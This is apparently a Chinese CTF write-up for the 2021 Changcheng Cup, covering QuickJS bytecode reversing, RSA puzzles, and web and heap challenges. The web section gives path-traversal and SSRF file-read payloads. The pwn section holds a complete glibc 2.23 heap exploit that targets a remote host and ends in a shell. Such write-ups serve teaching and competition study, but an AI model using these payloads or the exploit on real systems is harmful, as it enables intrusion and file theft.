00 c8 24 01 00 c5 06 c9
b8 9f c0 00 01 9e cd c4
04 c7 c9 48 9f c0 00 01
9e c5 04 c7 c9 48 ce c7
c9 72 c7 c4 04 48 4a c7
c4 04 ca 4a c7 c9 48 c7
c4 04 48 9f c0 00 01 9e
c5 07 c4 05 43 f9 00 00
00 c4 06 c7 c4 07 48 b0
24 01 00 0e 95 01 ee a6
c4 05 28 at 1, fixup atom: Array
at 45, fixup atom: charCodeAt
at 101, fixup atom: charCodeAt
at 165, fixup atom: push
}
debug {
044b: de 03 03 19 04 35 30 17
18 0d 30 7b 17 26 17 19
0d 12 1c 2c 40 2b 3f 17
2b 1d 4a 5d 17 filename: "source.js"
}
}
source.js:3: function: rc4
args: data key
locals:
0: var box
1: var i
2: var x
3: var temp
4: var y
5: var out
6: var code
7: var k
stack_size: 5
opcodes:
get_var Array
push_i16 256
call1 1
put_loc0 0: box
push_0 0
put_loc1 1: i
12: get_loc1 1: i
push_i16 256
lt
if_false8 27
get_loc0 0: box
get_loc1 1: i
get_loc1 1: i
put_array_el
inc_loc 1: i
goto8 12
27: push_0 0
put_loc2 2: x
push_0 0
put_loc1 1: i
31: get_loc1 1: i
push_i16 256
lt
if_false8 81
get_loc2 2: x
get_loc0 0: box
get_loc1 1: i
get_array_el
add
get_arg1 1: key
get_field2 charCodeAt
get_loc1 1: i
get_arg1 1: key
get_length
mod
call_method 1
add
push_i16 256
mod
put_loc2 2: x
get_loc0 0: box
get_loc1 1: i
get_array_el
put_loc3 3: temp
get_loc0 0: box
get_loc1 1: i
to_propkey2
get_loc0 0: box
get_loc2 2: x
get_array_el
put_array_el
get_loc0 0: box
get_loc2 2: x
get_loc3 3: temp
put_array_el
inc_loc 1: i
goto8 31
81: push_0 0
put_loc2 2: x
push_0 0
put_loc8 4: y
array_from 0
put_loc8 5: out
push_0 0
put_loc1 1: i
93: get_loc1 1: i
get_arg0 0: data
get_length
lt
if_false8 184
get_arg0 0: data
get_field2 charCodeAt
get_loc1 1: i
call_method 1
put_loc8 6: code
get_loc2 2: x
push_1 1
add
push_i16 256
mod
put_loc2 2: x
get_loc8 4: y
get_loc0 0: box
get_loc2 2: x
get_array_el
add
push_i16 256
mod
put_loc8 4: y
get_loc0 0: box
get_loc2 2: x
get_array_el
put_loc3 3: temp
get_loc0 0: box
get_loc2 2: x
to_propkey2
get_loc0 0: box
get_loc8 4: y
get_array_el
put_array_el
get_loc0 0: box
get_loc8 4: y
get_loc3 3: temp
put_array_el
get_loc0 0: box
get_loc2 2: x
get_array_el
get_loc0 0: box
get_loc8 4: y
get_array_el
add
push_i16 256
mod
put_loc8 7: k
get_loc8 5: out
get_field2 push
get_loc8 6: code
get_loc0 0: box
get_loc8 7: k
get_array_el
xor
call_method 1
drop
inc_loc 1: i
goto8 93
184: get_loc8 5: out
return

0468: 0a bigint {
0469: 00 }
046a: 0a bigint {
046b: 00 }
046c: 0a bigint {
046d: e8 01 07 len=7
0470: 44 b8 90 b5 6b 67 80 }
0477: 0a bigint {
0478: e8 01 07 len=7
047b: 34 a7 b8 48 7f 8d af }
0482: 0a bigint {
0483: 00 }
0484: 0a bigint {
0485: 28 01 len=1
0487: fe }
0488: 0a bigint {
0489: 28 01 len=1
048b: fe }
}
}
source.js:1: function: <eval>
locals:
0: var <ret>
stack_size: 32
opcodes:
check_define_var rc4,64
check_define_var sn,0
check_define_var i,0
check_define_var j,0
check_define_var k,0
check_define_var l,0
check_define_var m,0
check_define_var n,0
check_define_var un,0
check_define_var arr,0
check_define_var cipher,0
check_define_var i,0
fclosure8 0: [bytecode rc4]
define_func rc4,0
define_var sn,0
define_var i,0
define_var j,0
define_var k,0
define_var l,0
define_var m,0
define_var n,0
define_var un,0
define_var arr,0
define_var cipher,0
define_var i,0
push_atom_value "2021quickjs_happygame"
dup
put_var un
drop
push_atom_value "************************************"
dup
put_var sn
put_loc0 0: "<ret>"
push_i16 150
push_i16 224
push_i16 244
push_i8 68
push_i8 61
push_i8 125
push_i8 8
push_i16 239
push_i16 203
push_i16 254
push_i16 241
push_i8 113
push_i16 213
push_i16 176
push_i8 64
push_i8 106
push_i8 103
push_i16 166
push_i16 185
push_i16 159
push_i16 158
push_i16 172
push_i8 9
push_i16 213
push_i16 239
push_i8 12
push_i8 100
push_i16 185
push_i8 90
push_i16 174
push_i8 107
push_i16 131
array_from 32
push_i16 223
define_field "32"
push_i8 122
define_field "33"
push_i16 229
define_field "34"
push_i16 157
define_field "35"
dup
put_var arr
drop
push_const8 1: 0n
dup
put_var m
put_loc0 0: "<ret>"
push_const8 2: 0n
dup
put_var n
put_loc0 0: "<ret>"
push_0 0
dup
put_var l
put_loc0 0: "<ret>"
push_0 0
dup
put_var k
put_loc0 0: "<ret>"
get_var rc4
get_var sn
get_var un
call2 2
dup
put_var cipher
drop
undefined
put_loc0 0: "<ret>"
push_0 0
dup
put_var i
drop
361: get_var i
get_var cipher
get_length
lt
if_false8 484
get_var cipher
get_var i
get_array_el
dup
put_var j
put_loc0 0: "<ret>"
get_var j
push_i8 56
push_i8 17
sub
xor
dup
put_var l
put_loc0 0: "<ret>"
undefined
put_loc0 0: "<ret>"
get_var l
get_var arr
get_var k
get_array_el
eq
if_false8 446
get_var m
post_inc
put_var m
put_loc0 0: "<ret>"
goto8 458
446: get_var n
post_inc
put_var n
put_loc0 0: "<ret>"
458: get_var k
post_inc
put_var k
put_loc0 0: "<ret>"
get_var i
post_inc
put_var i
drop
goto8 361
484: undefined
put_loc0 0: "<ret>"
get_var m
get_var cipher
get_length
eq
if_false8 520
get_var n
push_0 0
eq
if_false8 520
push_const8 3: 18071254662143010n
dup
put_var n
put_loc0 0: "<ret>"
goto8 529
520: push_const8 4: 24706849372394394n
dup
put_var n
put_loc0 0: "<ret>"
529: push_empty_string
dup
put_var s
put_loc0 0: "<ret>"
undefined
put_loc0 0: "<ret>"
539: get_var n
push_const8 5: 0n
gt
if_false8 606
get_var s
get_var String
get_field2 fromCharCode
get_var Number
get_var n
push_const8 6: 127n
mod
call1 1
call_method 1
add
dup
put_var s
put_loc0 0: "<ret>"
get_var n
push_const8 7: 127n
div
dup
put_var n
put_loc0 0: "<ret>"
goto8 539
606: get_var print
get_var s
call1 1
set_loc0 0: "<ret>"
return

Error...

审一下bytecode发现很简单,就是一个rc4,然后把密文异或了一下进行比对。(一大堆其实就是去数组,然后还有就比对,如果正确cout就+1然后判断一下而已)

其中

    get_var j    push_i8 56    push_i8 17    sub    xor

这里做得时候有点迷,然后自己写了一个js,然后编译,再看

如果按 j=(j-56)^17 来算发现不对。按栈来推:依次压入 j、56、17,sub 弹出 56 和 17 压回 56-17=39,xor 再弹出 j 和 39,所以实际是 (56-17)^j,也就是 j^39。

最终exp:

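s = [150, 224, 244, 68, 61, 125, 8, 239, 203, 254, 241, 113, 213, 176, 64, 106, 103,
     166, 185, 159, 158, 172, 9, 213, 239, 12, 100, 185, 90, 174, 107, 131, 223, 122,
     229, 157]

KEY = b'2021quickjs_happygame'  # `un` in the bytecode
XOR_MASK = 56 - 17              # `push_i8 56; push_i8 17; sub; xor` -> j ^ 39


def rc4(key, data):
    """Plain RC4 (KSA + PRGA), the algorithm the dumped `rc4` function runs.

    Written out instead of importing Crypto.Cipher.ARC4 so the exp has no
    third-party dependency and can be checked against the bytecode line by
    line (key byte is key[i % len(key)], output byte is code ^ box[k] with
    k = (box[x] + box[y]) % 256).  RC4 is symmetric, so this both encrypts
    and decrypts.  ``key`` and ``data`` are bytes-like; returns bytes.
    """
    box = list(range(256))
    x = 0
    for i in range(256):
        x = (x + box[i] + key[i % len(key)]) % 256
        box[i], box[x] = box[x], box[i]
    out = bytearray()
    x = y = 0
    for code in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(code ^ box[(box[x] + box[y]) % 256])
    return bytes(out)


def recover_flag(arr, key=KEY):
    """Invert the <eval> check: it requires rc4(sn, un)[i] ^ 39 == arr[i].

    So the ciphertext is arr ^ 39 and the flag (sn) is that decrypted under
    the key.  Returns the flag as bytes.
    """
    cipher = bytes(c ^ XOR_MASK for c in arr)
    return rc4(key, cipher)


enc = [c ^ XOR_MASK for c in s]
print(enc)
print(recover_flag(s))
# sn='************************************'

#b'flag{2021_9u1ck_1s_v3r7_1nT3r3st1n9}'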

Web

java_url

打开网站源代码有一个 /download?filename=

通过 /download?filename=../../../../WEB-INF/web.xml 这种目录穿越的方式下载 WEB-INF/web.xml,从里面找到 servlet 对应的 class 文件路径再把 class 下载下来,然后反编译做代码审计。

发现 /testURL?url= 处存在一个 SSRF,代码对 file 等协议做了黑名单过滤,但过滤可以绕过:在 url 最前面加一个换行符(%0a),推测是黑名单按字符串开头匹配不到 file:,而 Java 的 URL 解析会忽略前导空白,仍按 file 协议去读。

直接绕协议

/testURL?url=%0afile:///flag

ez_python

网刃杯原题

链接:https://www.wolai.com/atao/j1B9DkYnEVRtVhrdJ2FPr8?theme=light

Pwn

K1ng_in_h3Ap_I

解题思路

程序有 UAF(释放后的 chunk 仍可编辑)。输入 666 会打印出 printf 地址的低 6 位十六进制(3 字节),所以不用爆破:直接利用 unsortedbin 残留的 libc 指针,只覆盖低 3 字节,就能准确申请到 stdout 结构体上方的位置,改写 stdout 的 flags 等字段泄露 libc;最后 fastbin 打到 __malloc_hook 附近,用 realloc 调整 rsp 后跳 onegadget。

exp

from pwn import *
#p=process('./pwn')
# Remote instance; uncomment the process() line above to debug locally.
p=remote('47.104.175.110',20066)

# Every hardcoded offset in the exploit below (the 3-byte target adjust, the
# stdout-leak delta, the 0x4527a one_gadget) is for this exact build:
# glibc 2.23-0ubuntu11.2, x86-64.  Swap the libc and they all move.
libc=ELF('/home/root2/Desktop/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')

def add(id, size):
    """Menu option 1: allocate `size` bytes into slot `id`."""
    p.sendlineafter('>> ', '1')
    p.sendlineafter('input index:', str(id))
    p.sendlineafter('input size:', str(size))



def delete(id):
    """Menu option 2: free slot `id` (the slot stays editable -- the UAF)."""
    p.sendlineafter('>> ', '2')
    p.sendlineafter('input index:', str(id))



def edit(id, con):
    """Menu option 3: write `con` into slot `id`, freed or not."""
    p.sendlineafter('>> ', '3')
    p.sendlineafter('input index:', str(id))
    p.sendlineafter('input context:', str(con))



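# NOTE: this is a Python 2 pwntools script -- str and bytes are concatenated
# freely below ('\x00' * 0x33 + p64(...)).  The arithmetic fix here is
# valid under both Python versions.

# --- leak: option 666 prints the low 6 hex digits (3 bytes) of a libc address
p.sendlineafter('>> ','666')
p.recvuntil('0x')
# Low 24 bits of the fake-chunk target just above _IO_2_1_stdout_.  The two
# constants presumably come from one run (0x342810 = leaked digits, 0x6b25dd
# = wanted target); the difference is a fixed libc-internal offset, so it
# carries over under ASLR as long as only the low 24 bits are used.
off=int(p.recv(6),16)-0x342810+0x6b25dd

# Only three bytes are written, so reduce modulo 2^24.  Shifts keep this an
# int under Python 3 (`/` would give a float and p8() would raise) and the
# mask on the third byte stops p8() from raising when the addition above
# carries past 0xffffff -- the original `off/0x10000` was unmasked.
off1=off&0xff
off2=(off>>8)&0xff
off3=(off>>16)&0xff

# --- heap layout: leave a libc pointer in a freed chunk, then redirect a
# fastbin freelist so a later malloc lands above stdout (UAF: freed slots
# stay editable).
add(0,0xd0)
add(1,0x60)
add(2,0x10)
delete(0)            # 0xd0 chunk -> unsorted bin, keeps libc pointers in its fd/bk
add(3,0x60)
add(4,0x60)
delete(4)
delete(1)
edit(1,'\x00')       # fastbin fd of freed slot 1 -> partial overwrite (null low byte)
edit(0,p8(off1)+p8(off2)+p8(off3))   # low 3 bytes of the stale libc pointer -> target
add(5,0x60)
add(6,0x60)
add(7,0x60)          # lands on the fake chunk above _IO_2_1_stdout_
# Overwrite stdout: flags = 0xfbad1800, read_ptr/read_end/read_base = 0 and
# the low byte of write_base zeroed, so the next output dumps libc pointers.
edit(7,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x00')

# 0x7f352f81c600 - 0x7f352f457000 = 0x3c5600: the leaked pointer's offset
# from the libc base in the author's run (glibc 2.23-0ubuntu11.2).
libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x7f352f81c600+0x7f352f457000

# From here the original sends the menu choice without waiting for '>> ':
# stdout's flags were just corrupted, so the prompt is presumably unreliable.
p.sendline('2')
p.sendlineafter('input index:','5')
delete(6)
# fastbin fd -> __malloc_hook - 0x23: the 0x7f byte there passes the size
# check for a 0x70 fastbin chunk.
edit(6,p64(libc_base+libc.sym['__malloc_hook']-0x23))

p.sendline('1')
p.sendlineafter('input index:',str(7))
p.sendlineafter('input size:',str(0x60))
p.sendline('1')
p.sendlineafter('input index:',str(8))
p.sendlineafter('input size:',str(0x60))
# User data starts at __malloc_hook - 0x13; 0xb bytes of padding reach
# __realloc_hook (= __malloc_hook - 8).  __realloc_hook <- one_gadget
# (0x4527a), __malloc_hook <- __libc_realloc + 8: malloc -> realloc+8
# (skips one push, which realigns rsp for the gadget) -> __realloc_hook.
edit(8,'a'*(0x13-8)+p64(libc_base+0x4527a)+p64(8+libc_base+libc.sym['__libc_realloc']))
p.interactive()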

Cry

baby_rsa

首先看 enc2:给了 n、e、c 以及 n 的一个因数(这个因数本身是合数,不是素数)。由它可以得到另外三个因数的和与积,但只知道三个数的和与积是解不出这三个数的。不过明文小于 512 比特,而给出的这个因数大于 513 比特,所以只要把这个因数本身分解掉,就可以只用它来解密(明文比模数小,模这个因数解密就够了)。

确实可以所以over

Enc1 更迷一些:只给了 c,连 n 都没有。但可以看出 p 是由幂指数生成的(p = v^(m+1) - (v+1)^m),并且 p 的比特长度被限制在一个很小的范围内。v、m 都未知,但 m 的范围很小,可以固定 m 的范围爆破;同样因为明文 m < p,只需要用这一个素数 p 就能解密,所以只要爆破出这一个素数即可。

from gmpy2 import *
from Crypto.Util.number import *
#de2
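# Prime factorisation of the one known (composite) factor of n.  Decrypting
# modulo that factor alone is enough because the plaintext is smaller than
# it (see the discussion above).
p=[191,193,627383,1720754738477317127758682285465031939891059835873975157555031327070111123628789833299433549669619325160679719355338187877758311485785197492710491]


def rsa_decrypt_multiprime(c, e, factors):
    """Decrypt RSA ciphertext `c` given the full factorisation of the modulus.

    `factors` must be the distinct primes whose product is the modulus:
    phi is computed as prod(q - 1), which is only right under that
    assumption (a repeated or composite factor silently gives a wrong d).
    `pow(e, -1, phi)` (Python 3.8+) replaces gmpy2.invert(e, phi) and raises
    ValueError when e is not invertible modulo phi.  Returns the plaintext
    as an int.
    """
    n = 1
    phi = 1
    for q in factors:
        n *= q
        phi *= q - 1
    d = pow(e, -1, phi)
    return pow(c, d, n)


e=65537
c=40625981017250262945230548450738951725566520252163410124565622126754739693681271649127104109038164852787767296403697462475459670540845822150397639923013223102912674748402427501588018866490878394678482061561521253365550029075565507988232729032055298992792712574569704846075514624824654127691743944112075703814043622599530496100713378696761879982542679917631570451072107893348792817321652593471794974227183476732980623835483991067080345184978482191342430627490398516912714451984152960348899589532751919272583098764118161056078536781341750142553197082925070730178092561314400518151019955104989790911460357848366016263083

m = rsa_decrypt_multiprime(c, e, p)
# Same output as long_to_bytes(m): big-endian, no leading zero bytes.
print(m.to_bytes(max(1, (m.bit_length() + 7) // 8), 'big'))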

#de1

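c=15808773921165746378224649554032774095198531782455904169552223303513940968292896814159288417499220739875833754573943607047855256739976161598599903932981169979509871591999964856806929597805904134099901826858367778386342376768508031554802249075072366710038889306268806744179086648684738023073458982906066972340414398928411147970593935244077925448732772473619783079328351522269170879807064111318871074291073581343039389561175391039766936376267875184581643335916049461784753341115227515163545709454746272514827000601853735356551495685229995637483506735448900656885365353434308639412035003119516693303377081576975540948311

e=65537


def brute_force_power_prime(c, e, m_range=range(1023, -1, -1), v_range=range(1023),
                            min_bits=1024, marker=b'flag'):
    """Search p = v**(m+1) - (v+1)**m and try decrypting `c` modulo p.

    For each exponent m only the first v whose p has more than `min_bits`
    bits is tried, as in the original search (p grows quickly in v, so later
    candidates are far past the expected size band).  A candidate is
    accepted when the decryption contains `marker`; there is no primality
    test, the marker check stands in for it.

    Fixes over the original: non-positive p is skipped (it used to be fed to
    bin() -- whose '-' sign inflated the bit count -- and then used as a
    modulus), and a non-invertible e just moves on to the next m instead of
    raising.  Prints each m as progress and the flag when found.  Returns
    the plaintext bytes, or None if nothing matched.
    """
    for m in m_range:
        print(m)
        for v in v_range:
            p = pow(v, m + 1) - pow(v + 1, m)
            if p <= 1 or p.bit_length() <= min_bits:
                continue
            try:
                d = pow(e, -1, p - 1)  # gmpy2.invert(e, p - 1) equivalent
            except ValueError:
                break  # gcd(e, p-1) != 1: cannot be the prime we want
            pt = pow(c, d, p)
            flag = pt.to_bytes(max(1, (pt.bit_length() + 7) // 8), 'big')
            if marker in flag:
                print(flag)
                return flag
            break  # only the first candidate per m (see docstring)
    return None


# Guarded so importing this file does not start a 1024-round search.
if __name__ == '__main__':
    brute_force_power_prime(c, e)

#flag{8102c552-3d78-4a42-b659-0c96ef827f05}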

#flag{8102c552-3d78-4a42-b659-0c96ef827f05}

2021第一届长城杯网络安全大赛WP

https://wp.n03tack.top/posts/11556/

作者

n03tAck

发布于

2021-09-19

更新于

2021-09-20
